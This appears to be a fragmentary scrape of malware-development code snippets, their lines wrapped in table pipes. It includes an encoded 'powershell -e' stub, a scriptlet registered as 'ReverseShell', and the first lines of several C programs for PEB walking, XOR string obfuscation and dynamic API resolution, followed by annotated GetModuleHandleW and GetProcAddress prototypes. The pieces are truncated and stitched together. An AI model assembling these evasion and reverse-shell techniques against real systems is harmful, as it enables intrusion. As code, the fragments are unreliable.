powershell -e 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 |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="ReverseShell" | |
progid="ReverseShell" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
> |
#include <windows.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include "helpers.h" | |
#pragma comment(linker, "/entry:WinMain") | |
typedef DWORD (WINAPI * WaitForSingleObject_t)( |
#include "PEstructs.h" | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include "helpers.h" | |
HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName) { | |
// get the offset of Process Environment Block |
#include <windows.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
void XOR(char * data, size_t data_len, char * key, size_t key_len) { | |
int j; | |
j = 0; |
#include <windows.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
int main(void) { | |
HMODULE hKernel32 = GetModuleHandle("kernel32.dll"); | |
HMODULE hNtdll = GetModuleHandle("ntdll.dll"); | |
DWORD oldprotect; | |
// Function pointers typedefs |
#include <windows.h> | |
#include <iostream> | |
#define KEY 'A' // our key | |
// Function to encrypt/decrypt strings | |
void XOR(LPSTR data, int data_len) { | |
for (int i = 0; i < data_len; i++) { | |
data[i] ^= KEY; | |
} |
#include <windows.h> | |
#include <iostream> | |
int main() { | |
// Load the user32.dll library | |
HMODULE user32Dll = GetModuleHandle(L"user32.dll"); | |
// Define a function pointer for MessageBoxW | |
typedef int (WINAPI* MessageBoxWFunc)( | |
HWND hwnd, |
// Win32 prototype (SDK documentation excerpt, not a definition).
// Returns the module handle of a DLL/EXE that is already mapped into the
// calling process, or NULL if no module with that name is loaded. It never
// loads a module itself; callers must check for NULL before using the handle.
HMODULE GetModuleHandleW( | |
[in, optional] LPCWSTR lpModuleName // name of an already-loaded module (DLL or EXE), e.g. user32.dll; NULL selects the calling process's own executable | |
);
// Win32 prototype (SDK documentation excerpt, not a definition).
// Resolves the address of a symbol exported by an already-loaded module.
// Returns NULL if the module handle is invalid or the export is not found;
// the FARPROC result must be cast to the correct function-pointer type
// (matching calling convention and arguments) before it is called.
FARPROC GetProcAddress( | |
[in] HMODULE hModule, // handle to the DLL module that exports the function we are looking for | |
[in] LPCSTR lpProcName // exported function name; may also be an ordinal value | |
);